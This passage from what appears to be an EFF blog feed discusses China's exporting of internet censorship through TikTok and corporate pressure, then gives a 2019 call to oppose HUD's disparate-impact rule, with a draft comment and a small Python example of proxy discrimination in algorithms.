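The notable design point is that the censorship code travels with every copy of the app; extending it abroad requires no new engineering, only flipping the condition that decides whose messages get checked.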

TikTok is one of the largest and fastest-growing global social media platforms spun out of Beijing. It heavily moderates its content, and supposedly has localized censors for different jurisdictions. But following a government crackdown on “short video” platforms at the beginning of this year, news outlets began reporting on the lack of Hong Kong-related content on the platform. TikTok’s leaked general moderation guidelines expressly forbid any content criticizing the Chinese government, like content related to the Chinese persecution of ethnic minorities, or about Tiananmen Square.

Internet users outside the United States may recognize the dynamic of a foreign service exporting its domestic decision-making abroad. For many years, America’s social media companies have been accused of exporting U.S. culture and policy to the rest of the world: Facebook imposes worldwide censorship of nudity and sexual language, even in countries that are more culturally permissive on these topics than the U.S. Most services obey DMCA takedown procedures for allegedly copyright-infringing content, even in countries that have alternative resolution laws. The influence that the United States has on its domestic tech industries has led to an outsized influence on those companies’ international user base.

That said, U.S. companies have, as with developers in most countries, resisted the inclusion of state-mandated filters or government-imposed code within their own applications. In China, domestic and foreign companies have been explicitly mandated to comply with Chinese censorship under the national Cybersecurity Law passed in 2017, which provides aggressive yet vague guidelines for content moderation. China imposing its rules on global Chinese tech companies differs from the United States’ influence on the global Internet in more than just degree.

Money Talks: But Critics Can’t

This brings us to the most visible arm of China’s new worldwide censorship toolkit: economic pressure on global companies. The Chinese domestic market is increasingly important to companies like Blizzard and the National Basketball Association (NBA). This means that China can use threats of boycotts or the denial of access to Chinese markets to silence these companies when they, or people affiliated with them, express support for the Hong Kong protestors.

Already, people are fighting back against the imposition of Chinese censorship on global companies. Blizzard employees staged a walk-out in protest, NBA fans continue to voice their support for the demonstrations in Hong Kong, and fans are rallying to boycott the two companies. But multi-national companies who can control their users’ speech can expect to see more pressure from China as its economic clout grows.

Is China setting the Standard for Global Enforcement of Local Law?

Parochial “Internet sovereignty” has proven insufficient for China’s needs: domestic policy objectives now require it to control the Internet outside as well as inside its borders.

To be clear, China’s government is not alone in this: rather than forcefully opposing and protesting its actions, other states—including the United States and the European Union—have been too busy making their own justifications for the extra-territorial exercise of their own surveillance and censorship capabilities.

China now projects its Internet power abroad through the pervasive and unabashed use of malware and state-supported DDoS attacks; mandated client-side filtering and surveillance; economic sanctions to limit cross-border free speech; and pressure on private entities to act as a global cultural police.

Unless lawmakers, corporations, and individual users are as brave in standing up to authoritarian acts as the people of Hong Kong, we can expect to see these tactics adopted by every state, against every user of the Internet.

Tell HUD: Algorithms Shouldn't Be an Excuse to Discriminate

EFF - Thu, 10/10/2019 - 1:29pm

The U.S. Department of Housing and Urban Development (HUD) recently released a proposed rule that will have grave consequences for the enforcement of fair housing laws. Under the Fair Housing Act, individuals can bring claims on the basis of a protected characteristic (like race, sex, or disability status) when there is a facially-neutral policy or practice that results in unjustified discriminatory effect, or disparate impact. The proposed rule makes it much harder to bring a disparate impact claim under the Fair Housing Act. Moreover, HUD’s rule creates three affirmative defenses for housing providers, banks, and insurance companies that use algorithmic models to make housing decisions. As we’ve previously explained, these algorithmic defenses demonstrate that HUD doesn’t understand how machine learning actually works.

This proposed rule could significantly impact housing decisions and make discrimination more prevalent. We encourage you to submit comments to speak out against HUD's proposed rule. Here's how to do it in three easy steps:

  1. Go to the government’s comments site and click on “Comment Now.”
  2. Start with the draft language below regarding EFF’s concerns with HUD’s proposed rule. We encourage you to tailor the comments to reflect your specific concerns. Adapting the language increases the chances that HUD will count your comment as a “unique” submission, which is important because HUD is required to read and respond to unique comments.
  3. Hit “Submit Comment” and feel good about doing your part to protect the civil rights of vulnerable communities and to educate the government about how technology actually works!

Comments are due by Friday, October 18, 2019 at 11:59 PM ET.

To Whom It May Concern:

I write to oppose HUD’s proposed rule, which would change the disparate impact standard for the agency’s enforcement of the Fair Housing Act. The proposed rule would set up a burden-shifting framework that would make it nearly impossible for a plaintiff to allege a claim of unjustified discriminatory effect. Moreover, the proposed rule offers a safe harbor for defendants who rely on algorithmic models to make housing decisions. HUD’s approach is unscientific and fails to understand how machine learning actually works.

HUD’s proposed rule offers three complete algorithmic defenses if: (1) the inputs used in the algorithmic model are not themselves “substitutes or close proxies” for protected characteristics and the model is predictive of risk or other valid objective; (2) a third party creates or manages the algorithmic model; or (3) a neutral third party examines the model and determines the model’s inputs are not close proxies for protected characteristics and the model is predictive of risk or other valid objective.

In the first and third defenses, HUD indicates that as long as a model’s inputs are not discriminatory, the overall model cannot be discriminatory. However, the whole point of sophisticated machine-learning algorithms is that they can learn how combinations of different inputs might predict something that any individual variable might not predict on its own. These combinations of different variables could be close proxies for protected classes, even if the original input variables are not. Apart from combinations of inputs, other factors, such as how an AI has been trained, can also lead to a model having a discriminatory effect, which HUD does not account for in its proposed rule. 
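A tiny worked example makes this concrete. In the toy dataset below (invented purely for illustration), neither input predicts the hypothetical protected class on its own, yet the two inputs together determine it exactly. This is precisely the kind of relationship a machine-learning model can exploit even when every individual input looks "clean" under HUD's proposed test:

```python
import itertools

# Toy dataset: two binary inputs whose combination exactly encodes a
# hypothetical protected class (here defined as a XOR b), even though
# neither input is correlated with it individually.
rows = [(a, b, a ^ b) for a, b in itertools.product([0, 1], repeat=2)]

def protected_rate(rows, predicate):
    """Fraction of rows with protected == 1 among rows matching predicate."""
    matching = [p for (a, b, p) in rows if predicate(a, b)]
    return sum(matching) / len(matching)

# Each input alone is uninformative: the protected rate is 50% either way.
assert protected_rate(rows, lambda a, b: a == 0) == 0.5
assert protected_rate(rows, lambda a, b: a == 1) == 0.5
assert protected_rate(rows, lambda a, b: b == 0) == 0.5
assert protected_rate(rows, lambda a, b: b == 1) == 0.5

# But the combination of the two inputs is a perfect proxy.
assert protected_rate(rows, lambda a, b: a != b) == 1.0
assert protected_rate(rows, lambda a, b: a == b) == 0.0
```

An input-by-input audit of the kind the proposed rule contemplates would pass this model, because no single variable is a "substitute or close proxy" for the protected characteristic; the discrimination lives entirely in the interaction the model learns.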

The second defense will shield housing providers, mortgage lenders, and insurance companies that rely on a third party’s algorithmic model, which will be the case for most defendants. This defense eliminates defendants’ incentive to avoid models that produce discriminatory effects, and their incentive to pressure model makers to ensure their algorithmic models avoid discriminatory outcomes. Moreover, it is unclear whether a plaintiff could actually get relief by going after a model maker, a distant and possibly unknown third party, rather than a direct defendant like a housing provider. Accordingly, this defense could allow discriminatory effects to continue without recourse. Even if a plaintiff can sue a third-party creator, trade secrets law could prevent the public from finding out about the discriminatory impact of the algorithmic model.

HUD claims that its proposed affirmative defenses are not meant to create a “special exemption for parties using algorithmic models” and thereby insulate them from disparate impact lawsuits. But that is exactly what the proposed rule will do. Today, a defendant’s use of an algorithmic model in a disparate impact case is considered on a case-by-case basis, with careful attention paid to the particular facts at issue. That is exactly how it should work.

I respectfully urge HUD to rescind its proposed rule and continue to use its current disparate impact standard.